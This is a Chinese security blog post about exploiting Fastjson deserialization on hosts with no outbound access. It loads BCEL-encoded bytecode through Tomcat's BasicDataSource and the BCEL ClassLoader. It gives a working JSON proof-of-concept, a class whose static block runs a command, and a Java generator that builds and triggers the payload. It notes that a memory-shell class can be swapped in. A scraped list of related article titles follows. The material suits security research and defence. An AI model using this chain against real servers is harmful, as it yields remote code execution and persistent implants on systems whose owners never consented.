Java安全之Fastjson内网利用

0x00 前言

在打Fastjson的时候,基本上都是使用JNDI注入的方式去打,也就是

JdbcRowSetImpl 链分析的链去打,但是遇到一些不出网的情况就没办法使用该链去执行命令。JdbcRowSetImpl 链分析

但在看到kingx师傅的一篇[Java动态类加载,当FastJson遇到内网]后,陷入了沉思。

0x01 BCEL字节码

这用到的是BCEL字节码然后使用classload进行加载。但是思考到一个问题,为什么是使用BCEL也不是直接使用TemplatesImpl链去做本地的命令执行呢?其实前文中提到过这TemplatesImpl的漏洞触发点会有限制。调用parseObject()方法时,需要加入Feature.SupportNonPublicField参数。

而在tomcat中的 com.sun.org.apache.bcel.internal.util.ClassLoader 的loadclass方法中可以进行bcel字节码的加载。

 protected Class loadClass(String class_name, boolean resolve)

    throws ClassNotFoundException

  {

    Class cl = null;

    /* First try: lookup hash table.

     */

    if((cl=(Class)classes.get(class_name)) == null) {

      /* Second try: Load system class using system class loader. You better

       * don't mess around with them.

       */

      for(int i=0; i < ignored_packages.length; i++) {

        if(class_name.startsWith(ignored_packages[i])) {

          cl = deferTo.loadClass(class_name);

          break;

        }

      }

      if(cl == null) {

        JavaClass clazz = null;

        /* Third try: Special request?

         */

        if(class_name.indexOf("$$BCEL$$") >= 0)

          clazz = createClass(class_name);

        else { // Fourth try: Load classes via repository

          if ((clazz = repository.loadClass(class_name)) != null) {

            clazz = modifyClass(clazz);

          }

          else

            throw new ClassNotFoundException(class_name);

        }

        if(clazz != null) {

          byte[] bytes  = clazz.getBytes();

          cl = defineClass(class_name, bytes, 0, bytes.length);

        } else // Fourth try: Use default class loader

          cl = Class.forName(class_name);

      }

      if(resolve)

        resolveClass(cl);

    }

    classes.put(class_name, cl);

    return cl;

  }

判断是否为$$BCEL$$的话则调用createClass方法,否则调用modifyClass方法返回一个class,modifyClass方法则是调用自带的classloader来加载。

来看到createClass方法

protected JavaClass createClass(String class_name) {

    int    index     = class_name.indexOf("$$BCEL$$");

    String real_name = class_name.substring(index + 8);

    JavaClass clazz = null;

    try {

      byte[]      bytes  = Utility.decode(real_name, true);

      ClassParser parser = new ClassParser(new ByteArrayInputStream(bytes), "foo");

      clazz = parser.parse();

    } catch(Throwable e) {

      e.printStackTrace();

      return null;

    }

截取$$BCEL$$字节后面的内容然后进行解密,解密为class字节码,调用defineClass进行加载字节码。

com.sun.org.apache.bcel.internal.classfile.Utility包中有BCEL字节码的解密和解密方法。

String s =  Utility.encode(data,true);

byte[] bytes  = Utility.decode(s, true);

0x02 利用链

添加tomcat依赖

<dependency>

    <groupId>org.apache.tomcat</groupId>

    <artifactId>tomcat-dbcp</artifactId>

    <version>9.0.8</version>

</dependency>

来看到poc

{

    {

        "x":{

                "@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",

                "driverClassLoader": {

                    "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"

                },

                "driverClassName": "$$BCEL$$$l$8b$I$A$..."

        }

    }: "x"

}

使用该poc加载bcel字节码。详细可移步到[Java动态类加载,当FastJson遇到内网]

编写一个test类

package com;

import java.io.IOException;

public class test {

    static {

        try {

            Runtime.getRuntime().exec("calc");

        } catch (IOException e) {

            e.printStackTrace();

        }

    }

}


package com;

import com.alibaba.fastjson.JSON;

import com.alibaba.fastjson.JSONObject;

import com.sun.org.apache.bcel.internal.Repository;

import com.sun.org.apache.bcel.internal.classfile.JavaClass;

import com.sun.org.apache.bcel.internal.classfile.Utility;

class fj_test {

    public static void main(String[] argv) throws Exception{

        JavaClass cls = Repository.lookupClass(test.class);

        String code = Utility.encode(cls.getBytes(), true);//转换为字节码并编码为bcel字节码

        String poc = "{\n" +

                "    {\n" +

                "        \"aaa\": {\n" +

                "                \"@type\": \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\n" +

                "                \"driverClassLoader\": {\n" +

                "                    \"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\n" +

                "                },\n" +

                "                \"driverClassName\": \"$$BCEL$$"+ code+ "\"\n" +

                "        }\n" +

                "    }: \"bbb\"\n" +

                "}";

        System.out.println(poc);

        JSON.parse(poc);

    }

}

需要打内存马替换为内存马class即可。

在tomcat8以后和tomcat7的版本存在一点小差异

tomcat7使用的类是org.apache.tomcat.dbcp.dbcp.BasicDataSource,而在8版本以后名为org.apache.tomcat.dbcp.dbcp2.BasicDataSource

0x03 结尾

即便如此我个人依然觉得fastjson并不能算是一个利用比较舒服的洞。而在实际中遇到更多的可能只是去进行反弹shell利用,需要使用becl必须考虑到fastjson版本问题。或在利用RMI/LDAP的话也会有JDK版本限制。

Java安全之Fastjson内网利用的更多相关文章

  1. JAVA获取访问者的内网IP地址

    /** * 获取访问者内网IP * @return the server ip */ public static String getIntranetIp() { // 本地IP,如果没有配置外网IP ...

  2. 【微信Java开发 --1】内网穿透外网,使用外网域名可以访问到本地项目

    1.首先上https://natapp.cn/ 2.接下来在网站申请账号 3.购买免费隧道 4.为你的免费隧道设置名称以及端口号,由于本人本地的使用Tomcat做服务器,所以用惯了8080端口,因此设 ...

  3. 利用Metasploit 打入ThinkPHP内网...

    出品|MS08067实验室(www.ms08067.com) 本文作者:dch(Ms08067实验室 SRSP TEAM小组成员) 一.利用Metasploit进行攻击的流程图   Metasploi ...

  4. Linux内网环境DNS修改域名指向,JAVA应用程序能否实时切换的问题总结

    公司内网环境中许多调用资源(数据库.web接口等)都是通过内网DNS服务来进行域名-IP的映射. 但经常出现DNS映射修改完毕后,应用中连接的资源迟迟没有变更. 以前一直笼统的认为是linux的dns ...

  5. [原创]利用Browser协议探测内网主机操作系统版本(无需端口无视防火墙)

    利用Browser协议可获取机器IP.MAC.机器名.操作系统.域,如图 浏览 在SMB协议中,计算机为了访问网络资源,就需要了解网络上存在的资源列表(例如在Windows下使用网络邻居查看可以访问的 ...

  6. SpringBoot之解决云服务器VPS在所处云端集群的内网不能解析域名的问题:java.net.UnknownHostException:abc.cn: Temporary failure in name resolution

    一.起因与原因分析过程 前端小伙伴儿告诉我,说服务器崩了. 请求数据接口,接口有响应,但报的json提示指向:数据库异常错误. 遂登陆云主机查看日志,核心记录显示如下: 2018-11-09 22:1 ...

  7. [转帖]利用hydra(九头蛇)暴力破解内网windows登录密码

    利用hydra(九头蛇)暴力破解内网windows登录密码 https://blog.csdn.net/weixin_37361758/article/details/77939070 尝试了下 能够 ...

  8. 利用端口映射解决:拥有公网IP有限,内网需要访问因特网

    动态端口映射:   内网中的一台电脑要访问新浪网,会向NAT网关发送数据包,包头中包括对方(就是新浪网)IP.端口和本机IP.端口,NAT网关会把本机IP.端口替换成自己的公网IP.一个未使用的端口, ...

  9. 利用iptables的NAT代理实现内网访问外网

    利用NAT代理实现内网访问外网 背景及原理 若局域网中的两台计算机只能有一台能够访问外网,而这两台计算机之间能相互通信,那么可以配置能访问外网的那台服务器实现路由器的功能,即实现其他机器的NAT转换, ...

随机推荐

  1. C++ primer plus读书笔记——第15章 友元、异常和其他

    第15章 友元.异常和其他 1. 友元类的所有方法都可以访问原有类的私有成员和保护成员.另外,也可以做更严格的限制,只将特定的成员函数指定为另一个类的友元.哪些函数.成员函数.或类为友元是由类定义的, ...

  2. 【技术博客】使用iview的Tree组件写一棵文件树

    本次项目的前端部分使用vue框架+iview组件构建,其中IDE的文件树部分使用了iview的Tree组件,但是Tree组件本身的接口功能极其有限,网上的相关资料也不多,在使用时费了一番功夫才摸索清楚 ...

  3. slickgrid ( nsunleo-slickgrid ) 8 区域选择与复制粘贴

    区域选择 区域选择是通过插件CellRangeSelector实现的,默认不支持跨冻结列进行选择,修正了选择,支持跨冻结列,代码如下,通过判断选择的起点和终点所落在的冻结范围进行计算,如从左往右进行复 ...

  4. xxl-job源码阅读二(服务端)

    1.源码入口 xxl-job-admin是一个简单的springboot工程,简单翻看源码,可以很快发现XxlJobAdminConfig入口. @Override public void after ...

  5. 【转载】深入理解OpenStack-手动制作qcow2镜像

    深入理解OpenStack-手动制作qcow2镜像 2018-01-18 手动制作镜像 1 官方虽提供qcow2系统镜像,但对于有需求的企业来说,还是定制镜像比较靠谱,下面就手动定制一个镜像 给虚拟机 ...

  6. php-round()四舍六入

    今天被问到了四舍六入的问题,好吧,第一次听说.后来查询之后说是银行家算法用的 摘自PHP官方文档.http://php.net/manual/zh/function.round.php (PHP 4, ...

  7. golang快速入门(五)初尝web服务

    提示:本系列文章适合对Go有持续冲动的读者 初探golang web服务 golang web开发是其一项重要且有竞争力的应用,本小结来看看再golang中怎么创建一个简单的web服务. 在不适用we ...

  8. 【进阶之路】多线程条件下分段处理List集合的几种方法

    这两个月来因为工作和家庭的事情,导致一直都很忙,没有多少时间去汲取养分,也就没有什么产出,最近稍微轻松了一点,后续的[进阶之路]会慢慢回到正轨. 开门见山的说,第一次接触到多线程处理同一个任务,是使用 ...

  9. GO学习-(10) Go语言基础之指针

    Go语言基础之指针 区别于C/C++中的指针,Go语言中的指针不能进行偏移和运算,是安全指针. 要搞明白Go语言中的指针需要先知道3个概念:指针地址.指针类型和指针取值. Go语言中的指针 任何程序数 ...

  10. Step By Step(Lua系统库)

    Step By Step(Lua系统库) Lua为了保证高度的可移植性,因此,它的标准库仅仅提供了非常少的功能,特别是和OS相关的库.但是Lua还提供了一些扩展库,比如Posix库等.对于文件操作而言 ...